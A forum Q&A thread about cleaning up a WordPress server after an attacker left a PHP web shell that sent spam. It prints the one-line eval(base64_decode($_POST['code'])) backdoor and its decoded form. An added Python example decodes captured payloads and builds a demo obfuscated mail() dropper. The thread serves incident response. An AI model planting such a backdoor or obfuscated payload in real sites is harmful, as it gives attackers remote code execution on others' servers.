Malicious PHP file found on my web server: I need help cleaning up and preventing this from happening again

My hosting provider recently suspended my site because something on it sent a huge amount of spam email. Initially, both I and the provider believed this was due to an unsecured email campaign form that I had put on the server a couple of days earlier. I deleted the form page from the server, but the server kept sending spam.

I found a PHP file named 7c32.php in the "css" folder in the server root. I definitely did not put it there. Here is the code that was in the file:

<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?> 

After running it through an online decoder, this is what it came out as:

 if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));} 

I read about malicious PHP files and saw that eval (and base64_decode) lines are very suspicious. I looked at the server log file and saw some mail requests involving this 7c32.php file coming from an IP address in Saudi Arabia.

I deleted the PHP file, updated all outdated WordPress themes and plugins (as well as WordPress itself), and changed the FTP and WordPress administrator passwords to something much more secure.

Is there anything else I should do to keep my server secure? I am going to search for these base64 and eval( lines in every other PHP file on the server, but apart from that I have no ideas.

This PHP script seems too short to do any damage, but what else could be sending all this spam mail?

Any help would be greatly appreciated.

+8
security php wordpress malware spam
2 answers

eval() is a very dangerous little language construct, because it executes whatever PHP code is passed to it as a string, so of course this script could be the one sending mail, although sending spam is actually about the least destructive thing eval() can be used for.

If your page had permission to delete every file in your web root, eval() could do that too, simply by POSTing the right code to the script.

If you really want to confirm that this is the code sending the mail, put it back, but change it to your advantage: take out the eval() and instead save the POST data to a database or a text file. That is the only way to find out exactly what this code is being used for.

+2
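Once eval() is swapped for logging as the answer suggests, the log holds the raw `code=...` request bodies, and the next step is reading them. The Python below is an added example, not part of the original answer or of any PHP project: it decodes a captured body the way the backdoor would have (base64 first, then whatever eval(gzinflate(base64_decode(...))) wrappers the payload carries) until plain PHP remains. The captured body, the mail() call inside it and the addresses are constructed for the demo.

```python
"""Decode a captured POST to the backdoor (added example, not from the answer).

Once eval() is replaced by logging, the log holds the raw `code=...` body.
Spam droppers usually wrap their payload in several layers, so this peels
base64, gzinflate (raw DEFLATE), gzuncompress (zlib), str_rot13 and strrev
until plain PHP remains. The captured body, the inner mail() call and the
addresses in it are constructed for the demo.
"""
import base64
import codecs
import re
import zlib
from urllib.parse import parse_qs, quote

# eval(wrapper1(wrapper2("blob"))): group 1 is the wrapper chain, group 2 the blob
_WRAPPED = re.compile(
    r'eval\s*\(\s*((?:(?:gzinflate|gzuncompress|base64_decode|str_rot13|strrev)\s*\(\s*)+)'
    r'["\']([^"\']+)["\']\s*\)+\s*;?',
    re.S,
)


def _apply(fn: str, data: bytes) -> bytes:
    """Python equivalent of each PHP wrapper function."""
    if fn == "base64_decode":
        return base64.b64decode(data)
    if fn == "gzinflate":           # raw DEFLATE stream, no zlib header
        return zlib.decompress(data, -15)
    if fn == "gzuncompress":        # zlib-wrapped DEFLATE
        return zlib.decompress(data)
    if fn == "str_rot13":
        return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")
    if fn == "strrev":
        return data[::-1]
    raise ValueError(f"unsupported wrapper {fn}")


def unwrap(php: str, max_layers: int = 10) -> str:
    """Strip eval(...("blob")) layers until none is left or max_layers is hit."""
    for _ in range(max_layers):
        m = _WRAPPED.search(php)
        if not m:
            return php
        chain = re.findall(r'[a-z0-9_]+', m.group(1))
        data = m.group(2).encode("latin-1")
        for fn in reversed(chain):      # the innermost call runs first
            data = _apply(fn, data)
        php = data.decode("latin-1")
    return php


def decode_captured_post(body: str, param: str = "code") -> str:
    """body: the raw x-www-form-urlencoded POST, as a logging honeypot would save it."""
    encoded = parse_qs(body, strict_parsing=True)[param][0]
    return unwrap(base64.b64decode(encoded).decode("latin-1"))


def build_demo_body() -> str:
    """Construct a body like a spam dropper would send: mail() inside gzinflate+base64."""
    inner = 'mail("victim@example.com", "Cheap pills", "Click here", "From: noreply@example.org");'
    comp = zlib.compressobj(wbits=-15)
    raw = comp.compress(inner.encode()) + comp.flush()
    layer = 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(raw).decode()
    return "code=" + quote(base64.b64encode(layer.encode()).decode(), safe="")


if __name__ == "__main__":
    print(decode_captured_post(build_demo_body()))
```

The decoded text is what the attacker's requests actually ran; with it you can match the mail() calls against the spam the host complained about and see whether the payload also dropped further files or read wp-config.php. Keep the captured bodies, they are your evidence.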

This PHP script seems too short to do any damage, but what else could be sending all this spam mail?

Do you think this code is too short to do damage? This is the worst kind of code: it uses eval().

The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use is thus discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user-provided data into it without properly validating it beforehand.

They can execute any PHP code using this "too short" code. eval = EVIL. Do not allow file upload permissions without verification.

but what else could be sending all this spam mail?

The same eval code sends the emails. They send it mail-sending code, and it in turn executes that code and sends the email.

+1
